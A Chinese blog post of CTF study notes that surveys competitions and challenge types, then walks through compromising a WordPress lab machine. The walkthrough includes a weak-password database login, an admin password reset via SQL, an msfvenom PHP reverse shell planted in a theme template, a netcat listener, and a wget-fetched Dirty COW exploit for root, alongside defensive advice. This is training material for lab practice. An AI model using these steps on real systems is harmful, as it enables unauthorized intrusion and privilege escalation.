jjzjj

CTF 学习笔记

梁辰兴 2024-04-07 原文

文章目录


一,CTF(Capture The Flag)

  • 中国一般译作夺旗赛,在网络安全领域中指的是网络网络安全技术人员之间进行攻防竞技的一种比赛形式。
  • 2019年国产电视剧《亲爱的,热爱的》,首次将CTF赛事搬进银幕,通过李现扮演的“韩商言”,让网络安全攻防技术正式进入大众视野。

1 CTF简介

CTF(Capture The Flag)
CTF起源于1996年DEFCON全球黑客大会,以替代之前黑客们通过互相发起真实攻击进行技术比拼的方式。

2 CTF赛事

2.1 国家赛事

国际知名CTF赛事:

  • DEFCON:CTF赛事中的“世界杯”。
  • UCSB iCTF:来自UCSB的面向世界高校的CTF。
  • Plaid CTF:包揽多项赛事冠军的CMU的PPP团队举办的在线解题赛。
  • Boston Key Party:近年来崛起的在线解题赛。
  • Codegate CTF:韩国首尔“大奖赛”,冠军奖金3000万韩元。
  • Secuinside CTF:韩国首尔“大奖赛”,冠军奖金3000万韩元。
  • XXC3 CTF:欧洲历史最悠久CCC黑客大会举办的CTF。

其中,DEFCON CTF及具影响力认可度非常高。

  • DEFCON极客大会是全球顶级的安全会议,诞生于1993年,被称为极客世界的“奥斯卡”。
  • 每年7月在美国的拉斯维加斯举行,近万名参会者除来自世界各地的极客、安全领域研究者、爱好者,还有全球许多大公司的代表以及美国国防部、联邦调查局、国家安全局等政府机构的官员。

2.2 国内赛事

  • XCTF联赛:国内最权威、最高技术水平与最大影响力的CTF赛事品台。
  • 强网杯:最权威的国家级安全比赛,中央网信办网络安全协调局指导。
  • 红帽杯:广东省公安厅,广东省计算机网络安全协会举办。
  • AliCTF:阿里安全技术竞赛,由阿里巴巴公司组织。
  • TCTF:腾讯信息安全争霸赛,由腾讯安全联合实验室主办。
  • BCTF:百度全国网络安全技术对抗赛,由百度安全主办。
  • WCTF:世黑客大师赛,由360Vulcan团队组织。
  • HCTF:由杭州电子科技大学信息安全协会主办的CTF。
  • ISCC:全国大学生信息安全与对抗技术竞赛,由北理工组织。

CTF赛事 :XCTF联赛

  • XCTF联赛由清华大学蓝莲花战队发起组织,网络空间安全人才基金和国家创新与发展战略研究会联合主办。
  • XCTF联赛是国内最权威,最高技术水平与最大影响力的网络安全CTF赛事平台。

红帽杯

  • 红帽杯由广东省公安厅指导,广东省计算机网络安全协会主办,是面向党政机关、企事业单位、高等院校、安全企业对外的大型网络安全赛事。
  • 推进广东省“红帽先锋”人才培养计划,锻炼网络安全技术人员的实战能力,提高网络安全防护的应用水平,促进广东省网络安全事业发展。

3 CTF意义

网络安全的学习非常需要实践来促进,而真实环境不具备这样的条件,CTF恰恰是一种锻炼和学习信息安全技术的训练场。

CTF 近期在国内的发展非常迅猛,认可度也非常高,这证明了CTF存在的合理性和必要性。

国家层面,通过CTF比赛,可以以赛代练,培养出一批国内优秀的网络安全人才。

企业层面,通过CTF比赛,可以更好练兵,让相关信息安全部门的人员,有效的提高安全意识,持续学习安全技能。

4 CTF学习

4.1 竞赛模式

解题模式(Jeopardy):线上赛

  • 在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,以解决网络安全技术挑战题目和分值和时间来排名,通常用于在线选拔赛。
  • 题目主要包含逆向、漏洞挖掘与利用。Web渗透、密码、取证、隐写、安全编程等类别。

攻防模式(Attack-Defense)

  • 在攻防模式CTF赛制中,参赛队伍在网络空间互相进行攻击和防守,挖掘网络服务漏洞并攻击对手服务得分,修补自身服务漏洞进行防御来避免丢分。
  • 攻防模式CTF赛制可以实时通过得分反映出比赛情况,最终也以得分直接分出胜负,是一种竞争激励,具有很强观赏性和高度透明性的网络安全赛制。

混合模式(Mix)

  • 结合了解题模式和攻防模式的CTF赛制,比如参赛队伍通过解题可以获得一些初始分数,然后通过攻防对抗进行得分增减的零和游戏,最后以分高低分出胜负。采用混合模式CTF赛制的典型代表如:iCTF国际CTF竞赛。

4.2 题目类型

Reverse(逆向工程)

  • 题目涉及软件逆向、破解技术等,要求有较强的反汇编、反编译功底。
  • 主要考查参赛选手的逆向分析能力。
  • 所需知识:汇编语言、加密与解密、常见反编译工具。

Pwn(破解)

  • Pwn 在黑客俚语中代表着攻破,获取权限,在CTF比赛中代表着溢出类题目,其中常见类型溢出漏洞有整数溢出、栈溢出等。
  • 主要考查参赛选手对而进制、漏洞挖掘和利用能力。
  • 所需知识:C/C++、OD+IDA、数据结构、操作系统、汇编原理。

Web(Web安全)

  • Web题目涉及到许多常见的Web漏洞,如XSS、文件包含、代码执行、上传漏洞、SQL注入等。也有一些简单的关于网络基础知识的考察,如返回包、tcp/ip、数据包内容和构造。
  • 主要考查选手Web站点漏洞挖掘和利用能力。
  • 所需知识:PHP、Python、TCP/IP、SQL、OWASP TOP10。

CryPto(加解密)

  • 题目考察各种加解密技术,包括古典加密技术、现代加密技术甚至出题者自创加密技术,以及一些常见的编码解码。
  • 主要考察参赛选手的密码学相关知识点。
  • 所需知识:矩阵、数论、密码学。

Misc(杂项)

  • Misc即安全杂项,题目涉及信息搜集、隐写术、流量分析、数字取证、编码转换等,覆盖面比较广。
  • 主要考察选手的各种基础综合知识。
  • 所需知识:常见的隐写术工具、Wireshark等流量审查工具、编码知识等。

Mobile(移动安全)

  • 主要分为Android和iOS两个平台,以Android逆向为主,破解APK并提交正确答案。
  • 主要考察选手APP漏洞挖掘和利用能力。
  • 所需知识:Java,Android开发。

4.3 学习建议

  • 在掌握一定的基础知识前提下,动手去做题。
  • 在能力范围的题目,尽可能自己解出。
  • 能力范围外的题目,参考writeup(题解)并亲手实践也非常有意义。

怎么判断题目是否在能力范围内?

  • 是否真的认真思考并尝试解题。
  • writeup中是否涉及自己的短板知识。

网站链接

二,CTF题目案例

第三届红帽杯题目为例

网络空间环境瞬息万变,其复杂性和专业性对网络安全人才也提出了更高要求,政府、企业、高校都在积极创新网络安全人才培养机制。作为改革开放的排头兵和先行地,广东省互联网呈现网络基础好、规模大、发展快、生态完善、前景广阔的特征,与此同时,广东省亦是遭受网络攻击的重灾区。为此,广东省分别以人才和技术为核心进行探索,积极构筑全方位的网络安全防线。
赛制全新升级,网络靶场内上演实战演习

本次决赛在往年“红帽杯”的基础上进行了赛制的全新升级,大赛聚焦关键信息基础设施的典型漏洞及风险,通过在平行仿真的网络靶场中,将现实网络空间的威胁斗争映射成赛场上激烈的攻防博弈,全面考核参赛队伍的漏洞发现、漏洞挖掘、漏洞修复、应急响应以及即时策略的综合能力,在高仿真、全场景的网络靶场中,全方位验证和提升选手实战能力。

三,CTF靶机实战

一步步拿下WordPres

1 实验环境

1.1 WordPress简介

  • WordPress是利用PHP开发的博客平台,用户可以在支持PHP和MySQL数据库的服务上架设属于自己的网站。也可以把WordPress当做一个内容管理系统(CMS)来使用。
  • WordPress是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用PHP语言和MySQL数据库开发的,用户可以在支持PHP和MySQL数据库的服务器上使用自己的博客。

1.2 实验拓扑图

1.3 攻防机器

靶场下载:
Tips:首次打开虚拟机时,要选择“我已移动该虚拟机”选项
渗透工具:Kail Linux

2 实验过程

第一步,信息收集

主机发现

  • 主机发现也采用arp-scannetdiscoverfping等工具。

端口扫描

  • 使用nmap对发现的主机IP进行扫描,命令:nmap -sS -sV -p- -v -T4 靶机IP

参数说明:

  • -A:详细扫描目标IP,加载所有脚本,尽可能全面的探测信息。
  • -v:显示详细的扫描过程。
  • -sS:TCP SYN扫描。
  • -sV:服务版本扫描。
  • -p-:扫描全部端口(等同于-p 1-65535
  • -T4:级别越高速度越快,最高为6级。

威胁建模

靶机开放端口及对应服务:

  • 22 SSH服务
  • 80 HTTP服务
  • 3306 MySQL服务

用Chrome浏览器访问靶机,通过Wappalyzer插件获得信息:

  • CMS:WordPress 5.0.4
  • 操作系统:Centos
  • 后端语言:PHP 5.3.3
  • 数据库:MySQL

第二步,漏洞挖掘

目录扫描

  • 目录扫描工具:Dirb、DirBuster、Gobuster、御剑

后台访问

1.手工尝试:

  • 尝试弱口令登录
  • 账号:root
  • 密码:root

2.后台访问 - phpmyadmin爆破工具
3.后台访问 - Burp爆破

第三步,漏洞利用

修改管理员密码

  • wordpress数据库中找到wp_user
  • 查询:select * from 'wp_users'
  • 密码经过加密,我们直接更新密码为123456:update wp_users set user_pass=md5('123456') where user_login='cleverbao';

登录后台

  • 浏览器访问http://靶机ip/wp_admin,输入账号密码,进入后台

修改数据库字段

  • 此靶机数据库部分字段,例如wp的ip地址需要进行修改,才能完成此实验。

生成shell 方法1

  • 利用MSF生成反弹shell:
    msfvenom -p php/meterpreter/reverse_tcp LHOST=Kail的IP LPORT=4444 -o Desktop/shell.php

生成shell 方法2

  • 利用Kail Linux自带的反弹shell
  • root@kail:~# cat /usr/share/webshells/php/php-resverse-shell.php
  • 复制此shell代码到404模板,修改IP为Kail地址,端口为4444

上传shell

  • 点击外观,选择里面的编辑,选择404模板,在404模板插入反弹shell。

获取shell

  • 使用netcat,监听4444端口:nc -nlvp 4444
  • 浏览器访问不存在的页面,触发404文件执行,例如http://靶机ip/?p=666

参数说明:

  • netcat:命令解析
  • -l:监听
  • -p:监听本地端口
  • -n:指定IP地址
  • -v:熟悉详细信息
  • -h:帮助文档

查看权限

  • 使用命令whoami,查看当前权限。
  • 当前为apache权限,还不是root权限,需要进一步的体权。
  • 注$代表用户权限,#代表root权限。

第四步,权限提升

漏洞概述

脏牛(Dirty COW)提权

  • 漏洞编号:CVE-2016-5195
  • 漏洞名称:脏牛(Dirty COW)
  • 漏洞危害:低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权影响范围:Linux内核>=2.6.22(2007年发行)开始就受影响了,直到2016年10月18日才修复。

原理:

  • Linux内核的内存子系统在处理写入时复制(copy-on-write,COW)时产生了竞争条件(race condition)。恶意用户可利用此漏洞,来获取高权限,对只读内存映射进行写访问。
  • 竞争条件,指的是任务执行顺序异常,可导致应用崩溃,或令攻击者有机可乘,甚是可能获得root权限。

官方发出的一个exp:

  • https://github.com/FireFart/dirtycow/blob/master/dirty.c

代码执行

  • 下载到kail桌面并进入目录,使用gcc编译:gcc-pthread dirty.c -o dirty -lcrypt
  • 设置为执行权限:chmod +x dirty
  • 使用python开启http服务:python -m SimpleHTTPSercer 80
  • 通过反弹的shell,进入靶机/tmp目录,使用wget下载dirty文件:wget http://kail的IP地址/dirty
  • 执行dirty完成提权,获得登录信息:./dirty new_password(任意密码)

3 思路总结

渗透全过程(红)

  • 主机发现,扫描和识别端口服务,找到20、80、3306
  • 目录扫描,找到敏感目录,包括数据库和网站后台
  • 手工尝试登录数据库后台,修改网站账号密码
  • 利用网站账号登录后台,上传网站木马(shell)
  • 执行网站木马获取低权限shell,判断系统版本寻找提权方法
  • 使用Dirty cow漏洞提权,获取管理员账号实现root权限

防御全过程(蓝)

  • 关闭不需要的端口,遵循最小化原则
  • 使用常见网站CMS时,修改默认后台路径
  • 使用PhpmyAdmin时,修改默认路径和密码
  • 升级操作系统版本,不定时打补丁漏洞
  • 关注最新漏洞情报,提升安全运维响应能力

账号密码汇总

  • 数据库后台账号密码:root / root
  • 网站管理员账号密码:cleverbao / 123456
  • 系统管理员账号密码:firefart / 123456

渗透工具汇总

  • 主机扫描:nmap、arp-scan、netdiscover
  • 目录遍历:dirb、dirbuster、gobuster、御剑
  • 漏洞挖掘与利用:phpmyadmin、burp、msf、netcat
  • 权限提升:dirty cow、gcc

有关CTF 学习笔记的更多相关文章

  1. LC滤波器设计学习笔记(一)滤波电路入门 - 2

    目录前言滤波电路科普主要分类实际情况单位的概念常用评价参数函数型滤波器简单分析滤波电路构成低通滤波器RC低通滤波器RL低通滤波器高通滤波器RC高通滤波器RL高通滤波器部分摘自《LC滤波器设计与制作》,侵权删。前言最近需要学习放大电路和滤波电路,但是由于只在之前做音乐频谱分析仪的时候简单了解过一点点运放,所以也是相当从零开始学习了。滤波电路科普主要分类滤波器:主要是从不同频率的成分中提取出特定频率的信号。有源滤波器:由RC元件与运算放大器组成的滤波器。可滤除某一次或多次谐波,最普通易于采用的无源滤波器结构是将电感与电容串联,可对主要次谐波(3、5、7)构成低阻抗旁路。无源滤波器:无源滤波器,又称

  2. CAN协议的学习与理解 - 2

    最近在学习CAN,记录一下,也供大家参考交流。推荐几个我觉得很好的CAN学习,本文也是在看了他们的好文之后做的笔记首先是瑞萨的CAN入门,真的通透;秀!靠这篇我竟然2天理解了CAN协议!实战STM32F4CAN!原文链接:https://blog.csdn.net/XiaoXiaoPengBo/article/details/116206252CAN详解(小白教程)原文链接:https://blog.csdn.net/xwwwj/article/details/105372234一篇易懂的CAN通讯协议指南1一篇易懂的CAN通讯协议指南1-知乎(zhihu.com)视频推荐CAN总线个人知识总

  3. 深度学习部署:Windows安装pycocotools报错解决方法 - 2

    深度学习部署:Windows安装pycocotools报错解决方法1.pycocotools库的简介2.pycocotools安装的坑3.解决办法更多Ai资讯:公主号AiCharm本系列是作者在跑一些深度学习实例时,遇到的各种各样的问题及解决办法,希望能够帮助到大家。ERROR:Commanderroredoutwithexitstatus1:'D:\Anaconda3\python.exe'-u-c'importsys,setuptools,tokenize;sys.argv[0]='"'"'C:\\Users\\46653\\AppData\\Local\\Temp\\pip-instal

  4. ruby - 我正在学习编程并选择了 Ruby。我应该升级到 Ruby 1.9 吗? - 2

    我完全不是程序员,正在学习使用Ruby和Rails框架进行编程。我目前正在使用Ruby1.8.7和Rails3.0.3,但我想知道我是否应该升级到Ruby1.9,因为我真的没有任何升级的“遗留”成本。缺点是什么?我是否会遇到与普通gem的兼容性问题,或者甚至其他我不太了解甚至无法预料的问题? 最佳答案 你应该升级。不要坚持从1.8.7开始。如果您发现不支持1.9.2的gem,请避免使用它们(因为它们很可能不被维护)。如果您对gem是否兼容1.9.2有任何疑问,您可以在以下位置查看:http://www.railsplugins.or

  5. ruby - 我如何学习 ruby​​ 的正则表达式? - 2

    如何学习ruby​​的正则表达式?(对于假人) 最佳答案 http://www.rubular.com/在Ruby中使用正则表达式时是一个很棒的工具,因为它可以立即将结果可视化。 关于ruby-我如何学习ruby​​的正则表达式?,我们在StackOverflow上找到一个类似的问题: https://stackoverflow.com/questions/1881231/

  6. 深度学习12. CNN经典网络 VGG16 - 2

    深度学习12.CNN经典网络VGG16一、简介1.VGG来源2.VGG分类3.不同模型的参数数量4.3x3卷积核的好处5.关于学习率调度6.批归一化二、VGG16层分析1.层划分2.参数展开过程图解3.参数传递示例4.VGG16各层参数数量三、代码分析1.VGG16模型定义2.训练3.测试一、简介1.VGG来源VGG(VisualGeometryGroup)是一个视觉几何组在2014年提出的深度卷积神经网络架构。VGG在2014年ImageNet图像分类竞赛亚军,定位竞赛冠军;VGG网络采用连续的小卷积核(3x3)和池化层构建深度神经网络,网络深度可以达到16层或19层,其中VGG16和VGG

  7. 机器学习——时间序列ARIMA模型(四):自相关函数ACF和偏自相关函数PACF用于判断ARIMA模型中p、q参数取值 - 2

    文章目录1、自相关函数ACF2、偏自相关函数PACF3、ARIMA(p,d,q)的阶数判断4、代码实现1、引入所需依赖2、数据读取与处理3、一阶差分与绘图4、ACF5、PACF1、自相关函数ACF自相关函数反映了同一序列在不同时序的取值之间的相关性。公式:ACF(k)=ρk=Cov(yt,yt−k)Var(yt)ACF(k)=\rho_{k}=\frac{Cov(y_{t},y_{t-k})}{Var(y_{t})}ACF(k)=ρk​=Var(yt​)Cov(yt​,yt−k​)​其中分子用于求协方差矩阵,分母用于计算样本方差。求出的ACF值为[-1,1]。但对于一个平稳的AR模型,求出其滞

  8. Unity Shader 学习笔记(5)Shader变体、Shader属性定义技巧、自定义材质面板 - 2

    写在之前Shader变体、Shader属性定义技巧、自定义材质面板,这三个知识点任何一个单拿出来都是一套知识体系,不能一概而论,本文章目的在于将学习和实际工作中遇见的问题进行总结,类似于网络笔记之用,方便后续回顾查看,如有以偏概全、不祥不尽之处,还望海涵。1、Shader变体先看一段代码......Properties{ [KeywordEnum(on,off)]USL_USE_COL("IsUseColorMixTex?",int)=0 [Toggle(IS_RED_ON)]_IsRed("IsRed?",int)=0}......//中间省略,后续会有完整代码 #pragmamulti_c

  9. Tcl脚本入门笔记详解(一) - 2

    TCL脚本语言简介•TCL(ToolCommandLanguage)是一种解释执行的脚本语言(ScriptingLanguage),它提供了通用的编程能力:支持变量、过程和控制结构;同时TCL还拥有一个功能强大的固有的核心命令集。TCL经常被用于快速原型开发,脚本编程,GUI和测试等方面。•实际上包含了两个部分:一个语言和一个库。首先,Tcl是一种简单的脚本语言,主要使用于发布命令给一些互交程序如文本编辑器、调试器和shell。由于TCL的解释器是用C\C++语言的过程库实现的,因此在某种意义上我们又可以把TCL看作C库,这个库中有丰富的用于扩展TCL命令的C\C++过程和函数,所以,Tcl是

  10. ruby-on-rails - 这个 C 和 PHP 程序员如何学习 Ruby 和 Rails? - 2

    按照目前的情况,这个问题不适合我们的问答形式。我们希望答案得到事实、引用或专业知识的支持,但这个问题可能会引发辩论、争论、投票或扩展讨论。如果您觉得这个问题可以改进并可能重新打开,visitthehelpcenter指导。关闭9年前。我来自C、php和bash背景,很容易学习,因为它们都有相同的C结构,我可以将其与我已经知道的联系起来。然后2年前我学了Python并且学得很好,Python对我来说比Ruby更容易学。然后从去年开始,我一直在尝试学习Ruby,然后是Rails,我承认,直到现在我还是学不会,讽刺的是那些打着简单易学的烙印,但是对于我这样一个老练的程序员来说,我只是无法将它

随机推荐